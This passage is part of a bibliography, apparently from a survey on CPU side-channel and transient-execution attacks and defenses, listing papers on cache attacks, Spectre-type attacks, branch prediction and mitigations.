Mohammad Rahmani Fadiheh, Alex Wezel, Johannes Müller, Jörg Bormann, Sayak Ray, Jason M. Fung, Subhasish Mitra, Dominik Stoffel, and Wolfgang Kunz. 2022. An exhaustive approach to detecting transient execution side channels in RTL designs of processors. IEEE Transactions on Computers 72, 1 (2022), 222–235.
[41]
Luís Fiolhais, Manuel Goulão, and Leonel Sousa. 2023. CoDi$: Randomized caches through confusion and diffusion. IEEE Access 11 (2023), 17265–17282. https://ieeexplore.ieee.org/document/10047886.
[42]
Kourosh Gharachorloo, Anoop Gupta, and John L. Hennessy. 1991. Two Techniques to Enhance the Performance of Memory Consistency Models. Computer Systems Laboratory, Stanford University.
[43]
Brian Grayson, Jeff Rupley, Gerald Zuraski Zuraski, Eric Quinnell, Daniel A. Jiménez, Tarun Nakra, Paul Kitchin, Ryan Hensley, Edward Brekelbaum, Vikas Sinha, and Ankit Ghiya. 2020. Evolution of the Samsung Exynos CPU microarchitecture. In Proceedings of the 2020 ACM/IEEE 47th Annual International Symposium on Computer Architecture (ISCA). IEEE, 40–51.
[44]
Marc Green, Leandro Rodrigues-Lima, Andreas Zankl, Gorka Irazoqui, Johann Heyszl, and Thomas Eisenbarth. 2017. AutoLock: Why cache attacks on ARM are harder than you think. In Proceedings of the 26th USENIX Security Symposium (USENIX Security 17). USENIX Association, 1075–1091. Retrieved from https://www.usenix.org/conference/usenixsecurity17/technical-sessions/presentation/green.
[45]
Daniel Gruss, Clémentine Maurice, Anders Fogh, Moritz Lipp, and Stefan Mangard. 2016. Prefetch side-channel attacks: Bypassing SMAP and kernel ASLR. In Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security (CCS’16). Association for Computing Machinery, New York, NY, 368–379.
[46]
Daniel Gruss, Clémentine Maurice, Klaus Wagner, and Stefan Mangard. 2016. Flush+Flush: A fast and stealthy cache attack. In Detection of Intrusions and Malware, and Vulnerability Assessment. Juan Caballero, Urko Zurutuza, and Ricardo J. Rodríguez (Eds.), Springer International Publishing, Cham, 279–299. Retrieved from https://gruss.cc/files/flushflush.pdf.
[47]
Marco Guarnieri, Boris Köpf, Jan Reineke, and Pepe Vila. 2021. Hardware-software contracts for secure speculation. In Proceedings of the 2021 IEEE Symposium on Security and Privacy (SP). 1868–1883.
[48]
David Gullasch, Endre Bangerter, and Stephan Krenn. 2011. Cache games – bringing access-based cache attacks on AES to practice. In Proceedings of the 2011 IEEE Symposium on Security and Privacy. IEEE, 490–505.
[49]
Rentong Guo, Xiaofei Liao, Hai Jin, Jianhui Yue, and Guang Tan. 2015. NightWatch: Integrating lightweight and transparent cache pollution control into dynamic memory allocation systems. In Proceedings of the 2015 USENIX Annual Technical Conference (USENIX ATC 15). USENIX Association, 307–318. Retrieved from https://www.usenix.org/conference/atc15/technical-session/presentation/guo.
[50]
Moinuddin Qureshi, Gururaj Saileshwar, and Sanjay Kariyappa. 2021. Seeds of SEED: Bespoke cache enclaves: Fine-grained and scalable isolation from cache side-channels via flexible set-partitioning. In Proceedings of the IEEE International Symposium on Secure and Private Execution Environment Design (SEED). IEEE, New York, NY.
[51]
Eric Hao, Po-Yung Chang, and Yale N. Patt. 1994. The effect of speculatively updating branch history on branch prediction accuracy, revisited. In Proceedings of the 27th Annual International Symposium on Microarchitecture. 228–232.
[52]
J. L. Hennessy, D. A. Patterson, and K. Asanović. 2012. Computer Architecture: A Quantitative Approach. Elsevier Science. Retrieved from https://books.google.pt/books?id=v3-1hVwHnHwC.
[53]
Andrew Herdrich, Edwin Verplanke, Priya Autee, Ramesh Illikkal, Chris Gianos, Ronak Singhal, and Ravi Iyer. 2016. Cache QoS: From concept to reality in the Intel® Xeon® processor E5-2600 v3 product family. In Proceedings of the 2016 IEEE International Symposium on High Performance Computer Architecture (HPCA). 657–668.
[54]
Jann Horn. 2018. Issue 1528: speculative execution, variant 4: speculative store bypass. (2018). Retrieved from https://bugs.chromium.org/p/project-zero/issues/detail?id=1528.
[55]
Taylor Hornby. 2016. Side-channel attacks on everyday applications: Distinguishing inputs with Flush+Reload. (2016). Retrieved from https://www.blackhat.com/docs/us-16/materials/us-16-Hornby-Side-Channel-Attacks-On-Everyday-Applications-wp.pdf.
[56]
Jaewon Hur, Suhwan Song, Sunwoo Kim, and Byoungyoung Lee. 2022. SpecDoctor: Differential fuzz testing to find transient execution vulnerabilities. In Proceedings of the 2022 ACM SIGSAC Conference on Computer and Communications Security. 1473–1487.
[57]
Jaewon Hur, Suhwan Song, Dongup Kwon, Eunjin Baek, Jangwoo Kim, and Byoungyoung Lee. 2021. DifuzzRTL: Differential fuzz testing to find CPU bugs. In Proceedings of the 2021 IEEE Symposium on Security and Privacy (SP). 1286–1303.
[58]
Intel. Intel 64 and IA-32 Architectures Software Developer’s Manual Volume 1: Basic Architecture. Retrieved from https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-1-manual.pdf.
[65]
Intel. 2020. Intel® 64 and IA-32 Architectures Software Developer’s Manual. Retrieved from https://cdrdv2.intel.com/v1/dl/getContent/671200.
[68]
G. Irazoqui, T. Eisenbarth, and B. Sunar. 2015. S$A: A shared cache attack that works across cores and defies VM sandboxing – and its application to AES. In Proceedings of the 2015 IEEE Symposium on Security and Privacy. 591–604. Retrieved from https://www.ieee-security.org/TC/SP2015/papers-archived/6949a591.pdf.
[69]
Gorka Irazoqui, Thomas Eisenbarth, and Berk Sunar. 2016. Cross processor cache attacks. In Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security (ASIA CCS’16). Association for Computing Machinery, New York, NY, 353–364.
[70]
Saad Islam, Ahmad Moghimi, Ida Bruhns, Moritz Krebbel, Berk Gulmezoglu, Thomas Eisenbarth, and Berk Sunar. 2019. SPOILER: Speculative load hazards boost rowhammer and cache attacks. In Proceedings of the 28th USENIX Security Symposium (USENIX Security 19). USENIX Association, 621–637. Retrieved from https://www.usenix.org/conference/usenixsecurity19/presentation/islam.
[71]
Aamer Jaleel, Eric Borch, Malini Bhandaru, Simon C. Steely Jr., and Joel Emer. 2010. Achieving non-inclusive cache performance with inclusive caches: Temporal locality aware (TLA) cache management policies. In Proceedings of the 2010 43rd Annual IEEE/ACM International Symposium on Microarchitecture. IEEE, 151–162.
[72]
Daniel A. Jiménez and Calvin Lin. 2001. Dynamic branch prediction with perceptrons. In Proceedings of the 7th International Symposium on High-Performance Computer Architecture (HPCA). IEEE, 197–206.
[73]
Daniel A. Jiménez and Calvin Lin. 2002. Neural methods for dynamic branch prediction. ACM Transactions on Computer Systems (TOCS) 20, 4 (2002), 369–397.
[74]
Brian Johannesmeyer, Jakob Koschel, Kaveh Razavi, Herbert Bos, and Cristiano Giuffrida. 2022. Kasper: Scanning for generalized transient execution gadgets in the Linux kernel. In Proceedings of the NDSS Symposium 2022.
[75]
Norman P. Jouppi. 1993. Cache write policies and performance. ACM SIGARCH Computer Architecture News 21, 2 (1993), 191–201.
[76]
Richard E. Kessler, Edward J. McLellan, and David A. Webb. 1998. The Alpha 21264 microprocessor architecture. In Proceedings of the International Conference on Computer Design. VLSI in Computers and Processors (Cat. No. 98CB36273). IEEE, 90–95.
[77]
Khaled N. Khasawneh, Esmaeil Mohammadian Koruyeh, Chengyu Song, Dmitry Evtyushkin, Dmitry Ponomarev, and Nael Abu-Ghazaleh. 2019. SafeSpec: Banishing the spectre of a meltdown with leakage-free speculation. In Proceedings of the 56th Annual Design Automation Conference 2019 (DAC’19). Association for Computing Machinery, New York, NY, Article 60, 6 pages.
[78]
Vladimir Kiriansky, Ilia Lebedev, Saman Amarasinghe, Srinivas Devadas, and Joel Emer. 2018. DAWG: A defense against cache timing attacks in speculative execution processors. In Proceedings of the 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture (MICRO). IEEE, 974–987.
[79]
V. Kiriansky, I. Lebedev, S. Amarasinghe, S. Devadas, and J. Emer. 2018. DAWG: A defense against cache timing attacks in speculative execution processors. In Proceedings of the 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture (MICRO). 974–987. Retrieved from https://eprint.iacr.org/2018/418.pdf.
[80]
Vladimir Kiriansky and Carl A. Waldspurger. 2018. Speculative buffer overflows: Attacks and defenses. arXiv:1807.03757. Retrieved from https://arxiv.org/abs/1807.03757.
[81]
Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz, and Yuval Yarom. 2019. Spectre attacks: Exploiting speculative execution. In Proceedings of the 40th IEEE Symposium on Security and Privacy (S&P’19). Retrieved from https://spectreattack.com/spectre.pdf.
[82]
Francois Koeune and Jean-Jacques Quisquater. 1999. A Timing Attack Against Rijndael. Université catholique de Louvain.
[83]
Esmaeil Mohammadian Koruyeh, Khaled N. Khasawneh, Chengyu Song, and Nael Abu-Ghazaleh. 2018. Spectre returns! Speculation attacks using the return stack buffer. In Proceedings of the 12th USENIX Workshop on Offensive Technologies (WOOT 18). USENIX Association. Retrieved from https://www.usenix.org/conference/woot18/presentation/koruyeh.
[84]
David Kroft. 1998. Lockup-free instruction fetch/prefetch cache organization. In Proceedings of the 25 Years of the International Symposia on Computer Architecture (Selected Papers). 195–201.
[85]
Leslie Lamport. 1979. How to make a multiprocessor computer that correctly executes multiprocess programs. IEEE Transactions on Computers C-28, 9 (1979), 690–691.
[86]
Mengming Li, Chenlu Miao, Yilong Yang, and Kai Bu. 2022. unXpec: Breaking undo-based safe speculation. In Proceedings of the 2022 IEEE International Symposium on High Performance Computer Architecture (HPCA). IEEE Press, New York, NY.
[87]
Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, Anders Fogh, Jann Horn, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval Yarom, and Mike Hamburg. 2018. Meltdown: Reading kernel memory from user space. In Proceedings of the 27th USENIX Security Symposium (USENIX Security 18). Retrieved from https://meltdownattack.com/meltdown.pdf.
[88]
F. Liu, Q. Ge, Y. Yarom, F. Mckeen, C. Rozas, G. Heiser, and R. B. Lee. 2016. CATalyst: Defeating last-level cache side channel attacks in cloud computing. In Proceedings of the 2016 IEEE International Symposium on High Performance Computer Architecture (HPCA). 406–418. Retrieved from http://palms.ee.princeton.edu/system/files/CATalyst_vfinal_correct.pdf.
[89]
F. Liu, H. Wu, K. Mai, and R. B. Lee. 2016. Newcache: Secure cache architecture thwarting cache side-channel attacks. IEEE Micro 36, 5 (2016), 8–16. Retrieved from http://palms.ee.princeton.edu/system/files/07723806.pdf.
[90]
F. Liu, Y. Yarom, Q. Ge, G. Heiser, and R. B. Lee. 2015. Last-level cache side-channel attacks are practical. In Proceedings of the 2015 IEEE Symposium on Security and Privacy. 605–622. Retrieved from http://palms.ee.princeton.edu/system/files/SP_vfinal.pdf.
[91]
Xiaoxuan Lou, Tianwei Zhang, Jun Jiang, and Yinqian Zhang. 2021. A survey of microarchitectural side-channel vulnerabilities, attacks, and defenses in cryptography. ACM Computing Surveys 54, 6, Article 122 (Jul. 2021), 37 pages.
[92]
Kevin Loughlin, Ian Neal, Jiacheng Ma, Elisa Tsai, Ofir Weisse, Satish Narayanasamy, and Baris Kasikci. 2021. DOLMA: Securing speculation with the principle of transient non-observability. In Proceedings of the USENIX Security Symposium. 1397–1414.
[93]
Giorgi Maisuradze and Christian Rossow. 2018. Ret2spec: Speculative execution using return stack buffers. In Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security (CCS’18). Association for Computing Machinery, New York, NY, 2109–2122.
[94]
Luc Maranget, Susmit Sarkar, and Peter Sewell. 2012. A tutorial introduction to the ARM and POWER relaxed memory models. Draft available from http://www.cl.cam.ac.uk/pes20/ppc-supplemental/test7.pdf (2012).
[95]
Milo M. K. Martin, Mark D. Hill, and David A. Wood. 2003. Token coherence: Decoupling performance and correctness. ACM SIGARCH Computer Architecture News 31, 2 (2003), 182–193.
[96]
Scott McFarling. 1993. Combining Branch Predictors. Technical Report. Citeseer.
[97]
Alyssa Milburn, Ke Sun, and Henrique Kawakami. 2022. You cannot always win the race: Analyzing the LFENCE/JMP mitigation for branch target injection. arXiv:2203.04277. Retrieved from https://arxiv.org/abs/2203.04277.
[98]
Daniel Moghimi, Moritz Lipp, Berk Sunar, and Michael Schwarz. 2020. Medusa: Microarchitectural data leakage via automated attack synthesis. In Proceedings of the 29th USENIX Security Symposium (USENIX Security 20). USENIX Association, 1427–1444. Retrieved from https://www.usenix.org/conference/usenixsecurity20/presentation/moghimi-medusa.
[99]
Andreas Moshovos, Scott E. Breach, Terani N. Vijaykumar, and Gurindar S. Sohi. 1997. Dynamic speculation and synchronization of data dependences. In Proceedings of the 24th Annual International Symposium on Computer Architecture. 181–193.
[100]
Andreas Moshovos, Scott E. Breach, T. N. Vijaykumar, and Gurindar S. Sohi. 1997. Dynamic speculation and synchronization of data dependences. SIGARCH Computer Architecture News 25, 2 (May 1997), 181–193.
[101]
A. Moshovos and G.S. Sohi. 1997. Streamlining inter-operation memory communication via data dependence prediction. In Proceedings of the 30th Annual International Symposium on Microarchitecture. IEEE Computer Society, 235–245.
[102]
Nicholas Mosier, Hanna Lachnitt, Hamed Nemati, and Caroline Trippel. 2021. Relational models of microarchitectures for formal security analyses. arXiv:2112.10511. Retrieved from https://arxiv.org/abs/2112.10511.
[103]
Mozilla. 2018. Mitigations landing for new class of timing attack. Retrieved from https://blog.mozilla.org/security/2018/01/03/mitigations-landing-new-class-timing-attack/.
[105]
Sujit Kumar Muduli, Gourav Takhar, and Pramod Subramanyan. 2020. HyperFuzzing for SoC security validation. In Proceedings of the 2020 IEEE/ACM International Conference On Computer Aided Design (ICCAD). 1–9.
[106]
Vijay Nagarajan, Daniel J. Sorin, Mark D. Hill, and David A. Wood. 2020. A primer on memory consistency and cache coherence, second edition. Synthesis Lectures on Computer Architecture 15, 1 (2020), 1–294.
[107]
Michael Neve and Jean-Pierre Seifert. 2007. Advances on access-driven cache attacks on AES. In Selected Areas in Cryptography. Eli Biham and Amr M. Youssef (Eds.), Springer, Berlin, 147–162.
[108]
Oleksii Oleksenko, Bohdan Trach, Mark Silberstein, and Christof Fetzer. 2020. SpecFuzz: Bringing spectre-type vulnerabilities to the surface. In Proceedings of the 29th USENIX Security Symposium (USENIX Security 20). USENIX Association, 1481–1498. Retrieved from https://www.usenix.org/conference/usenixsecurity20/presentation/oleksenko.
[109]
Dag Arne Osvik, Adi Shamir, and Eran Tromer. 2006. Cache attacks and countermeasures: The case of AES. In Topics in Cryptology—CT-RSA 2006. David Pointcheval (Ed.), Springer, Berlin, 1–20. Retrieved from https://www.cs.tau.ac.il/tromer/papers/cache.pdf.
[110]
Scott Owens, Susmit Sarkar, and Peter Sewell. 2009. A better x86 memory model: x86-TSO. In Proceedings of the International Conference on Theorem Proving in Higher Order Logics. Springer, 391–407.
[111]
Riccardo Paccagnella, Licheng Luo, and Christopher W. Fletcher. 2021. Lord of the ring(s): Side channel attacks on the CPU on-chip ring interconnect are practical. In Proceedings of the 30th USENIX Security Symposium (USENIX Security 21). USENIX Association, 645–662. Retrieved from https://www.usenix.org/conference/usenixsecurity21/presentation/paccagnella.
[112]
Dan Page. 2002. Theoretical use of cache memory as a cryptanalytic side-channel. Cryptology ePrint Archive (2002).
[113]
Shien-Tai Pan, Kimming So, and Joseph T. Rahmeh. 1992. Improving the accuracy of dynamic branch prediction using branch correlation. In Proceedings of the 5th International Conference on Architectural Support for Programming Languages and Operating Systems. 76–84.
[114]
D. A. Patterson and J. L. Hennessy. 2017. Computer Organization and Design RISC-V Edition: The Hardware Software Interface. Elsevier Science. Retrieved from https://books.google.pt/books?id=x3UnvgAACAAJ.
[115]
Colin Percival. 2005. Cache Missing for Fun and Profit. IRMACS Centre, Simon Fraser University, Burnaby, BC.
[116]
Peter Pessl, Daniel Gruss, Clémentine Maurice, Michael Schwarz, and Stefan Mangard. 2016. DRAMA: Exploiting DRAM addressing for cross-CPU attacks. In Proceedings of the 25th USENIX Security Symposium (USENIX Security 16). USENIX Association, Austin, TX, 565–581. Retrieved from https://www.usenix.org/conference/usenixsecurity16/technical-sessions/presentation/pessl.
[117]
Hernán Ponce-de León and Johannes Kinder. 2022. Cats vs. spectre: An axiomatic approach to modeling speculative execution attacks. In Proceedings of the 2022 IEEE Symposium on Security and Privacy (SP).
[118]
Christopher Pulte, Shaked Flur, Will Deacon, Jon French, Susmit Sarkar, and Peter Sewell. 2017. Simplifying ARM concurrency: Multicopy-atomic axiomatic and operational models for ARMv8. Proceedings of the ACM on Programming Languages 2, POPL, Article 19 (Dec. 2017), 29 pages.
[119]
Antoon Purnal, Furkan Turan, and Ingrid Verbauwhede. 2021. Prime+Scope: Overcoming the observer effect for high-precision cache contention attacks. In Proceedings of the 2021 ACM SIGSAC Conference on Computer and Communications Security (CCS’21). ACM.
[120]
Zhenxiao Qi, Qian Feng, Yueqiang Cheng, Mengjia Yan, Peng Li, Heng Yin, and Tao Wei. 2021. SpecTaint: Speculative taint analysis for discovering spectre gadgets. In Proceedings of the NDSS Symposium 2021.
[121]
M. K. Qureshi. 2018. CEASER: Mitigating conflict-based cache attacks via encrypted-address and remapping. In Proceedings of the 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture (MICRO). 775–787. Retrieved from http://memlab.ece.gatech.edu/papers/MICRO_2018_2.pdf.
[122]
Moinuddin K. Qureshi. 2019. New attacks and defense for encrypted-address cache. In Proceedings of the 46th International Symposium on Computer Architecture (ISCA’19). Association for Computing Machinery, New York, NY, 360–371.
[123]
Joseph Ravichandran, Weon Taek Na, Jay Lang, and Mengjia Yan. 2022. PACMAN: Attacking ARM pointer authentication with speculative execution. In Proceedings of the 49th Annual International Symposium on Computer Architecture. 685–698.
[124]
Xida Ren, Logan Moody, Mohammadkazem Taram, Matthew Jordan, Dean M. Tullsen, and Ashish Venkat. 2021. I see dead µops: Leaking secrets via Intel/AMD micro-op caches. In Proceedings of the 2021 ACM/IEEE 48th Annual International Symposium on Computer Architecture (ISCA). IEEE, 361–374.
[125]
Jordi Ribes-González, Oriol Farràs, Carles Hernández, Vatistas Kostalabros, and Miquel Moretó. 2022. A security model for randomization-based protected caches. Cryptology ePrint Archive (2022).
[126]
RISC-V International, Andrew Waterman and Krste Asanović (Eds.). 2019. The RISC-V Instruction Set Manual, Volume I: User-Level ISA, Document Version 2019121.
[127]
RISC-V International, Andrew Waterman, Krste Asanović, and John Hauser (Eds.). 2021. The RISC-V Instruction Set Manual, Volume II: Privileged Architecture, Document Version 20211203.
[128]
Ryan Roemer, Erik Buchanan, Hovav Shacham, and Stefan Savage. 2012. Return-oriented programming: Systems, languages, and applications. ACM Transactions on Information and System Security (TISSEC) 15, 1 (2012), 1–34.
[129]
Eric Rotenberg, Steve Bennett, and James E. Smith. 1996. Trace cache: A low latency approach to high bandwidth instruction fetching. In Proceedings of the 29th Annual IEEE/ACM International Symposium on Microarchitecture (MICRO 29). IEEE, 24–34.
[130]
Gururaj Saileshwar, Christopher W. Fletcher, and Moinuddin Qureshi. 2021. Streamline: A fast, flushless cache covert-channel attack by enabling asynchronous collusion. In Proceedings of the 26th ACM International Conference on Architectural Support for Programming Languages and Operating Systems (ASPLOS 2021). Association for Computing Machinery, New York, NY, 1077–1090.
[131]
Gururaj Saileshwar and Moinuddin Qureshi. 2021. MIRAGE: Mitigating conflict-based cache attacks with a practical fully-associative design. In Proceedings of the 30th USENIX Security Symposium (USENIX Security 21). USENIX Association. Retrieved from https://www.usenix.org/conference/usenixsecurity21/presentation/saileshwar.
[132]
Gururaj Saileshwar and Moinuddin K. Qureshi. 2019. CleanupSpec: An “Undo” approach to safe speculation. In Proceedings of the 52nd Annual IEEE/ACM International Symposium on Microarchitecture (MICRO’52). Association for Computing Machinery, New York, NY, 73–86.
[133]
Christos Sakalis, Stefanos Kaxiras, Alberto Ros, Alexandra Jimborean, and Magnus Själander. 2019. Efficient invisible speculative execution through selective delay and value prediction. In Proceedings of the 2019 ACM/IEEE 46th Annual International Symposium on Computer Architecture (ISCA). 723–735.
[134]
Michael Schwarz, Claudio Canella, Lukas Giner, and Daniel Gruss. 2019. Store-to-leak forwarding: Leaking data on meltdown-resistant CPUs. arXiv:1905.05725. Retrieved from https://arxiv.org/abs/1905.05725.
[135]
Michael Schwarz, Moritz Lipp, Daniel Moghimi, Jo Van Bulck, Julian Stecklina, Thomas Prescher, and Daniel Gruss. 2019. ZombieLoad: Cross-privilege-boundary data sampling. In Proceedings of the 2019 ACM SIGSAC Conference on Computer and Communications Security.
[136]
Michael Schwarz, Clémentine Maurice, Daniel Gruss, and Stefan Mangard. 2017. Fantastic timers and where to find them: High-resolution microarchitectural attacks in JavaScript. In Financial Cryptography and Data Security: 21st International Conference, FC 2017, Sliema, Malta, April 3-7, 2017, Revised Selected Papers 21. Springer, 247–267.
[137]
Scott Constable and Thomas Unterluggauer. 2021. Seeds of SEED: A side-channel resilient cache skewed by a linear function over a Galois field. In Proceedings of the IEEE International Symposium on Secure and Private Execution Environment Design (SEED). IEEE.
[138]
Simha Sethumadhavan, Rajagopalan Desikan, Doug Burger, Charles R. Moore, and Stephen W. Keckler. 2003. Scalable hardware memory disambiguation for high ILP processors. In Proceedings of the 36th Annual IEEE/ACM International Symposium on Microarchitecture (MICRO-36). IEEE, 399–410.
[139]
André Seznec. 2007. A 256 Kbits L-TAGE branch predictor. Journal of Instruction-Level Parallelism (JILP) Special Issue: The Second Championship Branch Prediction Competition (CBP-2) 9 (2007), 1–6.
[140]
André Seznec. 2016. TAGE-SC-L branch predictors again. In Proceedings of the 5th JILP Workshop on Computer Architecture Competitions (JWAC-5): Championship Branch Prediction (CBP-5).
[141]
Rami Sheikh and Derek Hower. 2019. Efficient load value prediction using multiple predictors and filters. In Proceedings of the 2019 IEEE International Symposium on High Performance Computer Architecture (HPCA). 454–465.
[142]
Ming-Wei Shih, Sangho Lee, Taesoo Kim, and Marcus Peinado. 2017. T-SGX: Eradicating controlled-channel attacks against enclave programs. In Network and Distributed System Security Symposium 2017 (NDSS’17). Internet Society. Retrieved from https://www.microsoft.com/en-us/research/publication/t-sgx-eradicating-controlled-channel-attacks-enclave-programs/.
[143]
James E. Smith. 1998. A study of branch prediction strategies. In Proceedings of the 25 Years of the International Symposia on Computer Architecture (Selected Papers). 202–215.
[145]
Stephan J. Jourdan, John Alan Miller, and Namratha Jaisimha. 2001. Return address stack including speculative return address buffer with back pointers. Patent No. US6898699B2. Filed 21st December, 2001; issued 24th May, 2005.
[146]
Sam S. Stone, Kevin M. Woley, and Matthew I. Frank. 2005. Address-indexed memory disambiguation and store-to-load forwarding. In Proceedings of the 38th Annual IEEE/ACM International Symposium on Microarchitecture (MICRO’05). IEEE, 12 pp.
[147]
Qinhan Tan, Zhihua Zeng, Kai Bu, and Kui Ren. 2020. PhantomCache: Obfuscating cache conflicts with localized randomization. In Proceedings of the 27th Annual Network and Distributed System Security Symposium, NDSS 2020, San Diego, California, February 23-26, 2020. The Internet Society. Retrieved from https://www.ndss-symposium.org/ndss-paper/phantomcache-obfuscating-cache-conflicts-with-localized-randomization/.
[148]
Mohammadkazem Taram, Ashish Venkat, and Dean Tullsen. 2019. Context-sensitive fencing: Securing speculative execution via microcode customization. In Proceedings of the 24th International Conference on Architectural Support for Programming Languages and Operating Systems (ASPLOS’19). Association for Computing Machinery, New York, NY, 395–410.
[149]
The Chromium Community. 2018. Mitigating Side-Channel Attacks. Retrieved from https://www.chromium.org/Home/chromium-security/ssca/.
[150]
The Linux Kernel Development Community. 2020. L1D Flushing. Retrieved from https://www.kernel.org/doc/html/latest/admin-guide/hw-vuln/l1d_flush.html.
[151]
The Linux Kernel Development Community. 2018. Microarchitectural Data Sampling (MDS) mitigation. Retrieved from https://www.kernel.org/doc/html/latest/arch/x86/mds.html.
[152]
The Microsoft Edge Team. 2018. Mitigating speculative execution side-channel attacks in Microsoft Edge and Internet Explorer. Retrieved from https://blogs.windows.com/msedgedev/2018/01/03/speculative-execution-mitigations-microsoft-edge-internet-explorer/.
[153]
Enrique F. Torres, Pablo Ibáñez, Víctor Viñals, and José María Llabería. 2005. Store buffer design in first-level multibanked data caches. In Proceedings of the 32nd International Symposium on Computer Architecture (ISCA’05). IEEE, 469–480.
[154]
Caroline Trippel, Daniel Lustig, and Margaret Martonosi. 2018. MeltdownPrime and SpectrePrime: Automatically-synthesized attacks exploiting invalidation-based coherence protocols. arXiv:1802.03802. Retrieved from https://arxiv.org/abs/1802.03802.
[155]
Po-An Tsai, Andres Sanchez, Christopher W. Fletcher, and Daniel Sanchez. 2021. Leaking secrets through compressed caches. IEEE Micro 41, 3 (2021), 27–33.
[156]
Paul Turner. 2018. Retpoline: A software construct for preventing branch-target-injection. Retrieved from https://support.google.com/faqs/answer/7625886.
[157]
Aakash Tyagi, Addison Crump, Ahmad-Reza Sadeghi, Garrett Persyn, Jeyavijayan Rajendran, Patrick Jauernig, and Rahul Kande. 2022. TheHuzz: Instruction fuzzing of processors using golden-reference models for finding software-exploitable vulnerabilities. In Proceedings of the 31st USENIX Security Symposium (USENIX Security 22). USENIX Association, Santa Clara, CA. https://arxiv.org/pdf/2201.09941.pdf.
[158]
Jo Van Bulck, Marina Minkin, Ofir Weisse, Daniel Genkin, Baris Kasikci, Frank Piessens, Mark Silberstein, Thomas F. Wenisch, Yuval Yarom, and Raoul Strackx. 2018. Foreshadow: Extracting the keys to the intel SGX kingdom with transient out-of-order execution. In Proceedings of the 27th USENIX Security Symposium. USENIX Association. See also technical report Foreshadow-NG [168].
[159]
Jo Van Bulck, Daniel Moghimi, Michael Schwarz, Moritz Lipp, Marina Minkin, Daniel Genkin, Yuval Yarom, Berk Sunar, Daniel Gruss, and Frank Piessens. 2020. LVI: Hijacking transient execution through microarchitectural load value injection. In Proceedings of the 41st IEEE Symposium on Security and Privacy (S&P’20).
[160]
Stephan van Schaik, Alyssa Milburn, Sebastian Österlund, Pietro Frigo, Giorgi Maisuradze, Kaveh Razavi, Herbert Bos, and Cristiano Giuffrida. 2019. RIDL: Rogue in-flight data load. In Proceedings of the IEEE Symposium on Security and Privacy.
[161]
Stephan van Schaik, Marina Minkin, Andrew Kwong, Daniel Genkin, and Yuval Yarom. 2021. CacheOut: Leaking data on Intel CPUs via cache evictions. In Proceedings of the IEEE Symposium on Security and Privacy.
[162]
Jose Rodrigo Sanchez Vicarte, Pradyumna Shome, Nandeeka Nayak, Caroline Trippel, Adam Morrison, David Kohlbrenner, and Christopher W. Fletcher. 2021. Opening Pandora’s box: A systematic study of new ways microarchitecture can leak private data. In Proceedings of the 2021 ACM/IEEE 48th Annual International Symposium on Computer Architecture (ISCA). IEEE, 347–360.
[163]
Jack Wampler, Ian Martiny, and Eric Wustrow. 2019. ExSpectre: Hiding malware in speculative execution. In Proceedings of the 26th Annual Network and Distributed System Security Symposium, NDSS 2019, San Diego, California, USA, February 24-27, 2019. The Internet Society. Retrieved from https://www.ndss-symposium.org/ndss-paper/exspectre-hiding-malware-in-speculative-execution/.
[164]
Yao Wang, Andrew Ferraiuolo, Danfeng Zhang, Andrew C. Myers, and G. Edward Suh. 2016. SecDCP: Secure dynamic cache partitioning for efficient timing channel protection. In Proceedings of the 53rd Annual Design Automation Conference (DAC’16). Association for Computing Machinery, New York, NY, Article 74, 6 pages.
[165]
Zhenghong Wang and Ruby B. Lee. 2006. Covert and side channels due to processor architecture. In Proceedings of the 2006 22nd Annual Computer Security Applications Conference (ACSAC’06). IEEE, 473–482.
[166]
D. Weiss, J.J. Wuu, and V. Chin. 2002. The on-chip 3-MB subarray-based third-level cache on an Itanium microprocessor. IEEE Journal of Solid-State Circuits 37, 11 (2002), 1523–1529.
[167]
Ofir Weisse, Ian Neal, Kevin Loughlin, Thomas F. Wenisch, and Baris Kasikci. 2019. NDA: Preventing speculative execution attacks at their source. In Proceedings of the 52nd Annual IEEE/ACM International Symposium on Microarchitecture. 572–586.
[168]
Ofir Weisse, Jo Van Bulck, Marina Minkin, Daniel Genkin, Baris Kasikci, Frank Piessens, Mark Silberstein, Raoul Strackx, Thomas F. Wenisch, and Yuval Yarom. 2018. Foreshadow-NG: Breaking the virtual memory abstraction with transient out-of-order execution. Technical Report (2018). See also USENIX Security paper Foreshadow [158].
[169]
Mario Werner, Thomas Unterluggauer, Lukas Giner, Michael Schwarz, Daniel Gruss, and Stefan Mangard. 2019. ScatterCache: Thwarting cache attacks via cache set randomization. In Proceedings of the 28th USENIX Security Symposium (USENIX Security 19). USENIX Association, 675–692. Retrieved from https://www.usenix.org/conference/usenixsecurity19/presentation/werner.
[170]
Johannes Wikner, Cristiano Giuffrida, Herbert Bos, and Kaveh Razavi. 2022. Spring: Spectre returning in the browser with speculative load queuing and deep stacks. In Proceedings of the 16th Workshop on Offensive Technologies (WOOT’22).
[171]
Nils Wistoff, Moritz Schneider, Frank K. Gürkaynak, Gernot Heiser, and Luca Benini. 2022. Systematic prevention of on-core timing channels by full temporal partitioning. IEEE Transactions on Computers (2022). Retrieved from https://arxiv.org/abs/2202.12029.
[172]
You Wu and Xuehai Qian. 2020. ReversiSpec: Reversible coherence protocol for defending transient attacks. arXiv:2006.16535. Retrieved from https://arxiv.org/abs/2006.16535.
[173]
Haocheng Xiao and Sam Ainsworth. 2023. Hacky racers: Exploiting instruction-level parallelism to generate stealthy fine-grained timers. In Proceedings of the 28th ACM International Conference on Architectural Support for Programming Languages and Operating Systems, Volume 2 (ASPLOS 2023). Association for Computing Machinery, New York, NY, 354–369.
[174]
Wenjie Xiong and Jakub Szefer. 2020. Leaking information through cache LRU states. In Proceedings of the 2020 IEEE International Symposium on High Performance Computer Architecture (HPCA’20). IEEE, 139–152. Retrieved from https://arxiv.org/abs/1905.08348.
[175]
